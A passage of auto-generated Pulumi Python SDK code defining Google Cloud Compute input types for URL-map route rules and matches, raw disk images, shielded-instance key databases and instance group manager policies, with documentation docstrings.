def timeout(self) -> Optional[pulumi.Input['DurationArgs']]:
"""
Specifies the timeout for the selected route. Timeout is computed from the time the request has been fully processed (known as *end-of-stream*) up until the response has been processed. Timeout includes all retries. If not specified, this field uses the largest timeout among all backend services associated with the route. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "timeout")
@timeout.setter
def timeout(self, value: Optional[pulumi.Input['DurationArgs']]):
pulumi.set(self, "timeout", value)
@property
@pulumi.getter(name="urlRewrite")
def url_rewrite(self) -> Optional[pulumi.Input['UrlRewriteArgs']]:
"""
The spec to modify the URL of the request, before forwarding the request to the matched service. urlRewrite is the only action supported in UrlMaps for external HTTP(S) load balancers. Not supported when the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true.
"""
return pulumi.get(self, "url_rewrite")
@url_rewrite.setter
def url_rewrite(self, value: Optional[pulumi.Input['UrlRewriteArgs']]):
pulumi.set(self, "url_rewrite", value)
@property
@pulumi.getter(name="weightedBackendServices")
def weighted_backend_services(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['WeightedBackendServiceArgs']]]]:
"""
A list of weighted backend services to send traffic to when a route match occurs. The weights determine the fraction of traffic that flows to their corresponding backend service. If all traffic needs to go to a single backend service, there must be one weightedBackendService with weight set to a non-zero number. After a backend service is identified and before forwarding the request to the backend service, advanced routing actions such as URL rewrites and header transformations are applied depending on additional settings specified in this HttpRouteAction.
"""
return pulumi.get(self, "weighted_backend_services")
@weighted_backend_services.setter
def weighted_backend_services(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['WeightedBackendServiceArgs']]]]):
pulumi.set(self, "weighted_backend_services", value)
@pulumi.input_type
class HttpRouteRuleMatchArgs:
def __init__(__self__, *,
full_path_match: Optional[pulumi.Input[str]] = None,
header_matches: Optional[pulumi.Input[Sequence[pulumi.Input['HttpHeaderMatchArgs']]]] = None,
ignore_case: Optional[pulumi.Input[bool]] = None,
metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input['MetadataFilterArgs']]]] = None,
prefix_match: Optional[pulumi.Input[str]] = None,
query_parameter_matches: Optional[pulumi.Input[Sequence[pulumi.Input['HttpQueryParameterMatchArgs']]]] = None,
regex_match: Optional[pulumi.Input[str]] = None):
"""
HttpRouteRuleMatch specifies a set of criteria for matching requests to an HttpRouteRule. All specified criteria must be satisfied for a match to occur.
:param pulumi.Input[str] full_path_match: For satisfying the matchRule condition, the path of the request must exactly match the value specified in fullPathMatch after removing any query parameters and anchor that may be part of the original URL. fullPathMatch must be from 1 to 1024 characters. Only one of prefixMatch, fullPathMatch or regexMatch must be specified.
:param pulumi.Input[Sequence[pulumi.Input['HttpHeaderMatchArgs']]] header_matches: Specifies a list of header match criteria, all of which must match corresponding headers in the request.
:param pulumi.Input[bool] ignore_case: Specifies that prefixMatch and fullPathMatch matches are case sensitive. The default value is false. ignoreCase must not be used with regexMatch. Not supported when the URL map is bound to a target gRPC proxy.
:param pulumi.Input[Sequence[pulumi.Input['MetadataFilterArgs']]] metadata_filters: Opaque filter criteria used by the load balancer to restrict routing configuration to a limited set of xDS compliant clients. In their xDS requests to the load balancer, xDS clients present node metadata. When there is a match, the relevant routing configuration is made available to those proxies. For each metadataFilter in this list, if its filterMatchCriteria is set to MATCH_ANY, at least one of the filterLabels must match the corresponding label provided in the metadata. If its filterMatchCriteria is set to MATCH_ALL, then all of its filterLabels must match with corresponding labels provided in the metadata. If multiple metadata filters are specified, all of them need to be satisfied in order to be considered a match. metadataFilters specified here is applied after those specified in ForwardingRule that refers to the UrlMap this HttpRouteRuleMatch belongs to. metadataFilters only applies to load balancers that have loadBalancingScheme set to INTERNAL_SELF_MANAGED. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[str] prefix_match: For satisfying the matchRule condition, the request's path must begin with the specified prefixMatch. prefixMatch must begin with a /. The value must be from 1 to 1024 characters. Only one of prefixMatch, fullPathMatch or regexMatch must be specified.
:param pulumi.Input[Sequence[pulumi.Input['HttpQueryParameterMatchArgs']]] query_parameter_matches: Specifies a list of query parameter match criteria, all of which must match corresponding query parameters in the request. Not supported when the URL map is bound to a target gRPC proxy.
:param pulumi.Input[str] regex_match: For satisfying the matchRule condition, the path of the request must satisfy the regular expression specified in regexMatch after removing any query parameters and anchor supplied with the original URL. For more information about regular expression syntax, see Syntax. Only one of prefixMatch, fullPathMatch or regexMatch must be specified. regexMatch only applies to load balancers that have loadBalancingScheme set to INTERNAL_SELF_MANAGED.
"""
if full_path_match is not None:
pulumi.set(__self__, "full_path_match", full_path_match)
if header_matches is not None:
pulumi.set(__self__, "header_matches", header_matches)
if ignore_case is not None:
pulumi.set(__self__, "ignore_case", ignore_case)
if metadata_filters is not None:
pulumi.set(__self__, "metadata_filters", metadata_filters)
if prefix_match is not None:
pulumi.set(__self__, "prefix_match", prefix_match)
if query_parameter_matches is not None:
pulumi.set(__self__, "query_parameter_matches", query_parameter_matches)
if regex_match is not None:
pulumi.set(__self__, "regex_match", regex_match)
@property
@pulumi.getter(name="fullPathMatch")
def full_path_match(self) -> Optional[pulumi.Input[str]]:
"""
For satisfying the matchRule condition, the path of the request must exactly match the value specified in fullPathMatch after removing any query parameters and anchor that may be part of the original URL. fullPathMatch must be from 1 to 1024 characters. Only one of prefixMatch, fullPathMatch or regexMatch must be specified.
"""
return pulumi.get(self, "full_path_match")
@full_path_match.setter
def full_path_match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "full_path_match", value)
@property
@pulumi.getter(name="headerMatches")
def header_matches(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['HttpHeaderMatchArgs']]]]:
"""
Specifies a list of header match criteria, all of which must match corresponding headers in the request.
"""
return pulumi.get(self, "header_matches")
@header_matches.setter
def header_matches(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['HttpHeaderMatchArgs']]]]):
pulumi.set(self, "header_matches", value)
@property
@pulumi.getter(name="ignoreCase")
def ignore_case(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies that prefixMatch and fullPathMatch matches are case sensitive. The default value is false. ignoreCase must not be used with regexMatch. Not supported when the URL map is bound to a target gRPC proxy.
"""
return pulumi.get(self, "ignore_case")
@ignore_case.setter
def ignore_case(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_case", value)
@property
@pulumi.getter(name="metadataFilters")
def metadata_filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MetadataFilterArgs']]]]:
"""
Opaque filter criteria used by the load balancer to restrict routing configuration to a limited set of xDS compliant clients. In their xDS requests to the load balancer, xDS clients present node metadata. When there is a match, the relevant routing configuration is made available to those proxies. For each metadataFilter in this list, if its filterMatchCriteria is set to MATCH_ANY, at least one of the filterLabels must match the corresponding label provided in the metadata. If its filterMatchCriteria is set to MATCH_ALL, then all of its filterLabels must match with corresponding labels provided in the metadata. If multiple metadata filters are specified, all of them need to be satisfied in order to be considered a match. metadataFilters specified here is applied after those specified in ForwardingRule that refers to the UrlMap this HttpRouteRuleMatch belongs to. metadataFilters only applies to load balancers that have loadBalancingScheme set to INTERNAL_SELF_MANAGED. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "metadata_filters")
@metadata_filters.setter
def metadata_filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MetadataFilterArgs']]]]):
pulumi.set(self, "metadata_filters", value)
@property
@pulumi.getter(name="prefixMatch")
def prefix_match(self) -> Optional[pulumi.Input[str]]:
"""
For satisfying the matchRule condition, the request's path must begin with the specified prefixMatch. prefixMatch must begin with a /. The value must be from 1 to 1024 characters. Only one of prefixMatch, fullPathMatch or regexMatch must be specified.
"""
return pulumi.get(self, "prefix_match")
@prefix_match.setter
def prefix_match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "prefix_match", value)
@property
@pulumi.getter(name="queryParameterMatches")
def query_parameter_matches(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['HttpQueryParameterMatchArgs']]]]:
"""
Specifies a list of query parameter match criteria, all of which must match corresponding query parameters in the request. Not supported when the URL map is bound to a target gRPC proxy.
"""
return pulumi.get(self, "query_parameter_matches")
@query_parameter_matches.setter
def query_parameter_matches(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['HttpQueryParameterMatchArgs']]]]):
pulumi.set(self, "query_parameter_matches", value)
@property
@pulumi.getter(name="regexMatch")
def regex_match(self) -> Optional[pulumi.Input[str]]:
"""
For satisfying the matchRule condition, the path of the request must satisfy the regular expression specified in regexMatch after removing any query parameters and anchor supplied with the original URL. For more information about regular expression syntax, see Syntax. Only one of prefixMatch, fullPathMatch or regexMatch must be specified. regexMatch only applies to load balancers that have loadBalancingScheme set to INTERNAL_SELF_MANAGED.
"""
return pulumi.get(self, "regex_match")
@regex_match.setter
def regex_match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "regex_match", value)
@pulumi.input_type
class HttpRouteRuleArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
header_action: Optional[pulumi.Input['HttpHeaderActionArgs']] = None,
http_filter_configs: Optional[pulumi.Input[Sequence[pulumi.Input['HttpFilterConfigArgs']]]] = None,
http_filter_metadata: Optional[pulumi.Input[Sequence[pulumi.Input['HttpFilterConfigArgs']]]] = None,
match_rules: Optional[pulumi.Input[Sequence[pulumi.Input['HttpRouteRuleMatchArgs']]]] = None,
priority: Optional[pulumi.Input[int]] = None,
route_action: Optional[pulumi.Input['HttpRouteActionArgs']] = None,
service: Optional[pulumi.Input[str]] = None,
url_redirect: Optional[pulumi.Input['HttpRedirectActionArgs']] = None):
"""
The HttpRouteRule setting specifies how to match an HTTP request and the corresponding routing action that load balancing proxies perform.
:param pulumi.Input[str] description: The short description conveying the intent of this routeRule. The description can have a maximum length of 1024 characters.
:param pulumi.Input['HttpHeaderActionArgs'] header_action: Specifies changes to request and response headers that need to take effect for the selected backendService. The headerAction value specified here is applied before the matching pathMatchers[].headerAction and after pathMatchers[].routeRules[].routeAction.weightedBackendService.backendServiceWeightAction[].headerAction HeaderAction is not supported for load balancers that have their loadBalancingScheme set to EXTERNAL. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[Sequence[pulumi.Input['HttpFilterConfigArgs']]] http_filter_configs: Outbound route specific configuration for networkservices.HttpFilter resources enabled by Traffic Director. httpFilterConfigs only applies for load balancers with loadBalancingScheme set to INTERNAL_SELF_MANAGED. See ForwardingRule for more details. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[Sequence[pulumi.Input['HttpFilterConfigArgs']]] http_filter_metadata: Outbound route specific metadata supplied to networkservices.HttpFilter resources enabled by Traffic Director. httpFilterMetadata only applies for load balancers with loadBalancingScheme set to INTERNAL_SELF_MANAGED. See ForwardingRule for more details. The only configTypeUrl supported is type.googleapis.com/google.protobuf.Struct Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[Sequence[pulumi.Input['HttpRouteRuleMatchArgs']]] match_rules: The list of criteria for matching attributes of a request to this routeRule. This list has OR semantics: the request matches this routeRule when any of the matchRules are satisfied. However predicates within a given matchRule have AND semantics. All predicates within a matchRule must match for the request to match the rule.
:param pulumi.Input[int] priority: For routeRules within a given pathMatcher, priority determines the order in which a load balancer interprets routeRules. RouteRules are evaluated in order of priority, from the lowest to highest number. The priority of a rule decreases as its number increases (1, 2, 3, N+1). The first rule that matches the request is applied. You cannot configure two or more routeRules with the same priority. Priority for each rule must be set to a number from 0 to 2147483647 inclusive. Priority numbers can have gaps, which enable you to add or remove rules in the future without affecting the rest of the rules. For example, 1, 2, 3, 4, 5, 9, 12, 16 is a valid series of priority numbers to which you could add rules numbered from 6 to 8, 10 to 11, and 13 to 15 in the future without any impact on existing rules.
:param pulumi.Input['HttpRouteActionArgs'] route_action: In response to a matching matchRule, the load balancer performs advanced routing actions, such as URL rewrites and header transformations, before forwarding the request to the selected backend. If routeAction specifies any weightedBackendServices, service must not be set. Conversely if service is set, routeAction cannot contain any weightedBackendServices. Only one of urlRedirect, service or routeAction.weightedBackendService must be set. UrlMaps for external HTTP(S) load balancers support only the urlRewrite action within a route rule's routeAction.
:param pulumi.Input[str] service: The full or partial URL of the backend service resource to which traffic is directed if this rule is matched. If routeAction is also specified, advanced routing actions, such as URL rewrites, take effect before sending the request to the backend. However, if service is specified, routeAction cannot contain any weightedBackendServices. Conversely, if routeAction specifies any weightedBackendServices, service must not be specified. Only one of urlRedirect, service or routeAction.weightedBackendService must be set.
:param pulumi.Input['HttpRedirectActionArgs'] url_redirect: When this rule is matched, the request is redirected to a URL specified by urlRedirect. If urlRedirect is specified, service or routeAction must not be set. Not supported when the URL map is bound to a target gRPC proxy.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if header_action is not None:
pulumi.set(__self__, "header_action", header_action)
if http_filter_configs is not None:
pulumi.set(__self__, "http_filter_configs", http_filter_configs)
if http_filter_metadata is not None:
pulumi.set(__self__, "http_filter_metadata", http_filter_metadata)
if match_rules is not None:
pulumi.set(__self__, "match_rules", match_rules)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if route_action is not None:
pulumi.set(__self__, "route_action", route_action)
if service is not None:
pulumi.set(__self__, "service", service)
if url_redirect is not None:
pulumi.set(__self__, "url_redirect", url_redirect)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The short description conveying the intent of this routeRule. The description can have a maximum length of 1024 characters.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="headerAction")
def header_action(self) -> Optional[pulumi.Input['HttpHeaderActionArgs']]:
"""
Specifies changes to request and response headers that need to take effect for the selected backendService. The headerAction value specified here is applied before the matching pathMatchers[].headerAction and after pathMatchers[].routeRules[].routeAction.weightedBackendService.backendServiceWeightAction[].headerAction HeaderAction is not supported for load balancers that have their loadBalancingScheme set to EXTERNAL. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "header_action")
@header_action.setter
def header_action(self, value: Optional[pulumi.Input['HttpHeaderActionArgs']]):
pulumi.set(self, "header_action", value)
@property
@pulumi.getter(name="httpFilterConfigs")
def http_filter_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['HttpFilterConfigArgs']]]]:
"""
Outbound route specific configuration for networkservices.HttpFilter resources enabled by Traffic Director. httpFilterConfigs only applies for load balancers with loadBalancingScheme set to INTERNAL_SELF_MANAGED. See ForwardingRule for more details. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "http_filter_configs")
@http_filter_configs.setter
def http_filter_configs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['HttpFilterConfigArgs']]]]):
pulumi.set(self, "http_filter_configs", value)
@property
@pulumi.getter(name="httpFilterMetadata")
def http_filter_metadata(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['HttpFilterConfigArgs']]]]:
"""
Outbound route specific metadata supplied to networkservices.HttpFilter resources enabled by Traffic Director. httpFilterMetadata only applies for load balancers with loadBalancingScheme set to INTERNAL_SELF_MANAGED. See ForwardingRule for more details. The only configTypeUrl supported is type.googleapis.com/google.protobuf.Struct Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "http_filter_metadata")
@http_filter_metadata.setter
def http_filter_metadata(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['HttpFilterConfigArgs']]]]):
pulumi.set(self, "http_filter_metadata", value)
@property
@pulumi.getter(name="matchRules")
def match_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['HttpRouteRuleMatchArgs']]]]:
"""
The list of criteria for matching attributes of a request to this routeRule. This list has OR semantics: the request matches this routeRule when any of the matchRules are satisfied. However predicates within a given matchRule have AND semantics. All predicates within a matchRule must match for the request to match the rule.
"""
return pulumi.get(self, "match_rules")
@match_rules.setter
def match_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['HttpRouteRuleMatchArgs']]]]):
pulumi.set(self, "match_rules", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
For routeRules within a given pathMatcher, priority determines the order in which a load balancer interprets routeRules. RouteRules are evaluated in order of priority, from the lowest to highest number. The priority of a rule decreases as its number increases (1, 2, 3, N+1). The first rule that matches the request is applied. You cannot configure two or more routeRules with the same priority. Priority for each rule must be set to a number from 0 to 2147483647 inclusive. Priority numbers can have gaps, which enable you to add or remove rules in the future without affecting the rest of the rules. For example, 1, 2, 3, 4, 5, 9, 12, 16 is a valid series of priority numbers to which you could add rules numbered from 6 to 8, 10 to 11, and 13 to 15 in the future without any impact on existing rules.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="routeAction")
def route_action(self) -> Optional[pulumi.Input['HttpRouteActionArgs']]:
"""
In response to a matching matchRule, the load balancer performs advanced routing actions, such as URL rewrites and header transformations, before forwarding the request to the selected backend. If routeAction specifies any weightedBackendServices, service must not be set. Conversely if service is set, routeAction cannot contain any weightedBackendServices. Only one of urlRedirect, service or routeAction.weightedBackendService must be set. UrlMaps for external HTTP(S) load balancers support only the urlRewrite action within a route rule's routeAction.
"""
return pulumi.get(self, "route_action")
@route_action.setter
def route_action(self, value: Optional[pulumi.Input['HttpRouteActionArgs']]):
pulumi.set(self, "route_action", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
The full or partial URL of the backend service resource to which traffic is directed if this rule is matched. If routeAction is also specified, advanced routing actions, such as URL rewrites, take effect before sending the request to the backend. However, if service is specified, routeAction cannot contain any weightedBackendServices. Conversely, if routeAction specifies any weightedBackendServices, service must not be specified. Only one of urlRedirect, service or routeAction.weightedBackendService must be set.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="urlRedirect")
def url_redirect(self) -> Optional[pulumi.Input['HttpRedirectActionArgs']]:
"""
When this rule is matched, the request is redirected to a URL specified by urlRedirect. If urlRedirect is specified, service or routeAction must not be set. Not supported when the URL map is bound to a target gRPC proxy.
"""
return pulumi.get(self, "url_redirect")
@url_redirect.setter
def url_redirect(self, value: Optional[pulumi.Input['HttpRedirectActionArgs']]):
pulumi.set(self, "url_redirect", value)
@pulumi.input_type
class ImageRawDiskArgs:
def __init__(__self__, *,
container_type: Optional[pulumi.Input['ImageRawDiskContainerType']] = None,
source: Optional[pulumi.Input[str]] = None):
"""
The parameters of the raw disk image.
:param pulumi.Input['ImageRawDiskContainerType'] container_type: The format used to encode and transmit the block device, which should be TAR. This is just a container and transmission format and not a runtime format. Provided by the client when the disk image is created.
:param pulumi.Input[str] source: The full Google Cloud Storage URL where the raw disk image archive is stored. The following are valid formats for the URL: - https://storage.googleapis.com/bucket_name/image_archive_name - https://storage.googleapis.com/bucket_name/folder_name/ image_archive_name In order to create an image, you must provide the full or partial URL of one of the following: - The rawDisk.source URL - The sourceDisk URL - The sourceImage URL - The sourceSnapshot URL
"""
if container_type is not None:
pulumi.set(__self__, "container_type", container_type)
if source is not None:
pulumi.set(__self__, "source", source)
@property
@pulumi.getter(name="containerType")
def container_type(self) -> Optional[pulumi.Input['ImageRawDiskContainerType']]:
"""
The format used to encode and transmit the block device, which should be TAR. This is just a container and transmission format and not a runtime format. Provided by the client when the disk image is created.
"""
return pulumi.get(self, "container_type")
@container_type.setter
def container_type(self, value: Optional[pulumi.Input['ImageRawDiskContainerType']]):
pulumi.set(self, "container_type", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The full Google Cloud Storage URL where the raw disk image archive is stored. The following are valid formats for the URL: - https://storage.googleapis.com/bucket_name/image_archive_name - https://storage.googleapis.com/bucket_name/folder_name/ image_archive_name In order to create an image, you must provide the full or partial URL of one of the following: - The rawDisk.source URL - The sourceDisk URL - The sourceImage URL - The sourceSnapshot URL
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@pulumi.input_type
class InitialStateConfigArgs:
def __init__(__self__, *,
dbs: Optional[pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]]] = None,
dbxs: Optional[pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]]] = None,
keks: Optional[pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]]] = None,
pk: Optional[pulumi.Input['FileContentBufferArgs']] = None):
"""
Initial State for shielded instance, these are public keys which are safe to store in public
:param pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]] dbs: The Key Database (db).
:param pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]] dbxs: The forbidden key database (dbx).
:param pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]] keks: The Key Exchange Key (KEK).
:param pulumi.Input['FileContentBufferArgs'] pk: The Platform Key (PK).
"""
if dbs is not None:
pulumi.set(__self__, "dbs", dbs)
if dbxs is not None:
pulumi.set(__self__, "dbxs", dbxs)
if keks is not None:
pulumi.set(__self__, "keks", keks)
if pk is not None:
pulumi.set(__self__, "pk", pk)
@property
@pulumi.getter
def dbs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]]]:
"""
The Key Database (db).
"""
return pulumi.get(self, "dbs")
@dbs.setter
def dbs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]]]):
pulumi.set(self, "dbs", value)
@property
@pulumi.getter
def dbxs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]]]:
"""
The forbidden key database (dbx).
"""
return pulumi.get(self, "dbxs")
@dbxs.setter
def dbxs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]]]):
pulumi.set(self, "dbxs", value)
@property
@pulumi.getter
def keks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]]]:
"""
The Key Exchange Key (KEK).
"""
return pulumi.get(self, "keks")
@keks.setter
def keks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FileContentBufferArgs']]]]):
pulumi.set(self, "keks", value)
@property
@pulumi.getter
def pk(self) -> Optional[pulumi.Input['FileContentBufferArgs']]:
"""
The Platform Key (PK).
"""
return pulumi.get(self, "pk")
@pk.setter
def pk(self, value: Optional[pulumi.Input['FileContentBufferArgs']]):
pulumi.set(self, "pk", value)
@pulumi.input_type
class InstanceGroupManagerAutoHealingPolicyArgs:
def __init__(__self__, *,
health_check: Optional[pulumi.Input[str]] = None,
initial_delay_sec: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] health_check: The URL for the health check that signals autohealing.
:param pulumi.Input[int] initial_delay_sec: The number of seconds that the managed instance group waits before it applies autohealing policies to new instances or recently recreated instances. This initial delay allows instances to initialize and run their startup scripts before the instance group determines that they are UNHEALTHY. This prevents the managed instance group from recreating its instances prematurely. This value must be from range [0, 3600].
"""
if health_check is not None:
pulumi.set(__self__, "health_check", health_check)
if initial_delay_sec is not None:
pulumi.set(__self__, "initial_delay_sec", initial_delay_sec)
@property
@pulumi.getter(name="healthCheck")
def health_check(self) -> Optional[pulumi.Input[str]]:
"""
The URL for the health check that signals autohealing.
"""
return pulumi.get(self, "health_check")
@health_check.setter
def health_check(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health_check", value)
@property
@pulumi.getter(name="initialDelaySec")
def initial_delay_sec(self) -> Optional[pulumi.Input[int]]:
"""
The number of seconds that the managed instance group waits before it applies autohealing policies to new instances or recently recreated instances. This initial delay allows instances to initialize and run their startup scripts before the instance group determines that they are UNHEALTHY. This prevents the managed instance group from recreating its instances prematurely. This value must be from range [0, 3600].
"""
return pulumi.get(self, "initial_delay_sec")
@initial_delay_sec.setter
def initial_delay_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "initial_delay_sec", value)
@pulumi.input_type
class InstanceGroupManagerUpdatePolicyArgs:
def __init__(__self__, *,
instance_redistribution_type: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyInstanceRedistributionType']] = None,
max_surge: Optional[pulumi.Input['FixedOrPercentArgs']] = None,
max_unavailable: Optional[pulumi.Input['FixedOrPercentArgs']] = None,
min_ready_sec: Optional[pulumi.Input[int]] = None,
minimal_action: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyMinimalAction']] = None,
most_disruptive_allowed_action: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedAction']] = None,
replacement_method: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyReplacementMethod']] = None,
type: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyType']] = None):
"""
:param pulumi.Input['InstanceGroupManagerUpdatePolicyInstanceRedistributionType'] instance_redistribution_type: The instance redistribution policy for regional managed instance groups. Valid values are: - PROACTIVE (default): The group attempts to maintain an even distribution of VM instances across zones in the region. - NONE: For non-autoscaled groups, proactive redistribution is disabled.
:param pulumi.Input['FixedOrPercentArgs'] max_surge: The maximum number of instances that can be created above the specified targetSize during the update process. This value can be either a fixed number or, if the group has 10 or more instances, a percentage. If you set a percentage, the number of instances is rounded if necessary. The default value for maxSurge is a fixed value equal to the number of zones in which the managed instance group operates. At least one of either maxSurge or maxUnavailable must be greater than 0. Learn more about maxSurge.
:param pulumi.Input['FixedOrPercentArgs'] max_unavailable: The maximum number of instances that can be unavailable during the update process. An instance is considered available if all of the following conditions are satisfied: - The instance's status is RUNNING. - If there is a health check on the instance group, the instance's health check status must be HEALTHY at least once. If there is no health check on the group, then the instance only needs to have a status of RUNNING to be considered available. This value can be either a fixed number or, if the group has 10 or more instances, a percentage. If you set a percentage, the number of instances is rounded if necessary. The default value for maxUnavailable is a fixed value equal to the number of zones in which the managed instance group operates. At least one of either maxSurge or maxUnavailable must be greater than 0. Learn more about maxUnavailable.
:param pulumi.Input[int] min_ready_sec: Minimum number of seconds to wait for after a newly created instance becomes available. This value must be from range [0, 3600].
:param pulumi.Input['InstanceGroupManagerUpdatePolicyMinimalAction'] minimal_action: Minimal action to be taken on an instance. You can specify either RESTART to restart existing instances or REPLACE to delete and create new instances from the target template. If you specify a RESTART, the Updater will attempt to perform that action only. However, if the Updater determines that the minimal action you specify is not enough to perform the update, it might perform a more disruptive action.
:param pulumi.Input['InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedAction'] most_disruptive_allowed_action: Most disruptive action that is allowed to be taken on an instance. You can specify either NONE to forbid any actions, REFRESH to allow actions that do not need instance restart, RESTART to allow actions that can be applied without instance replacing or REPLACE to allow all possible actions. If the Updater determines that the minimal update action needed is more disruptive than most disruptive allowed action you specify it will not perform the update at all.
:param pulumi.Input['InstanceGroupManagerUpdatePolicyReplacementMethod'] replacement_method: What action should be used to replace instances. See minimal_action.REPLACE
:param pulumi.Input['InstanceGroupManagerUpdatePolicyType'] type: The type of update process. You can specify either PROACTIVE so that the instance group manager proactively executes actions in order to bring instances to their target versions or OPPORTUNISTIC so that no action is proactively executed but the update will be performed as part of other actions (for example, resizes or recreateInstances calls).
"""
if instance_redistribution_type is not None:
pulumi.set(__self__, "instance_redistribution_type", instance_redistribution_type)
if max_surge is not None:
pulumi.set(__self__, "max_surge", max_surge)
if max_unavailable is not None:
pulumi.set(__self__, "max_unavailable", max_unavailable)
if min_ready_sec is not None:
pulumi.set(__self__, "min_ready_sec", min_ready_sec)
if minimal_action is not None:
pulumi.set(__self__, "minimal_action", minimal_action)
if most_disruptive_allowed_action is not None:
pulumi.set(__self__, "most_disruptive_allowed_action", most_disruptive_allowed_action)
if replacement_method is not None:
pulumi.set(__self__, "replacement_method", replacement_method)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="instanceRedistributionType")
def instance_redistribution_type(self) -> Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyInstanceRedistributionType']]:
"""
The instance redistribution policy for regional managed instance groups. Valid values are: - PROACTIVE (default): The group attempts to maintain an even distribution of VM instances across zones in the region. - NONE: For non-autoscaled groups, proactive redistribution is disabled.
"""
return pulumi.get(self, "instance_redistribution_type")
@instance_redistribution_type.setter
def instance_redistribution_type(self, value: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyInstanceRedistributionType']]):
pulumi.set(self, "instance_redistribution_type", value)
@property
@pulumi.getter(name="maxSurge")
def max_surge(self) -> Optional[pulumi.Input['FixedOrPercentArgs']]:
"""
The maximum number of instances that can be created above the specified targetSize during the update process. This value can be either a fixed number or, if the group has 10 or more instances, a percentage. If you set a percentage, the number of instances is rounded if necessary. The default value for maxSurge is a fixed value equal to the number of zones in which the managed instance group operates. At least one of either maxSurge or maxUnavailable must be greater than 0. Learn more about maxSurge.
"""
return pulumi.get(self, "max_surge")
@max_surge.setter
def max_surge(self, value: Optional[pulumi.Input['FixedOrPercentArgs']]):
pulumi.set(self, "max_surge", value)
@property
@pulumi.getter(name="maxUnavailable")
def max_unavailable(self) -> Optional[pulumi.Input['FixedOrPercentArgs']]:
"""
The maximum number of instances that can be unavailable during the update process. An instance is considered available if all of the following conditions are satisfied: - The instance's status is RUNNING. - If there is a health check on the instance group, the instance's health check status must be HEALTHY at least once. If there is no health check on the group, then the instance only needs to have a status of RUNNING to be considered available. This value can be either a fixed number or, if the group has 10 or more instances, a percentage. If you set a percentage, the number of instances is rounded if necessary. The default value for maxUnavailable is a fixed value equal to the number of zones in which the managed instance group operates. At least one of either maxSurge or maxUnavailable must be greater than 0. Learn more about maxUnavailable.
"""
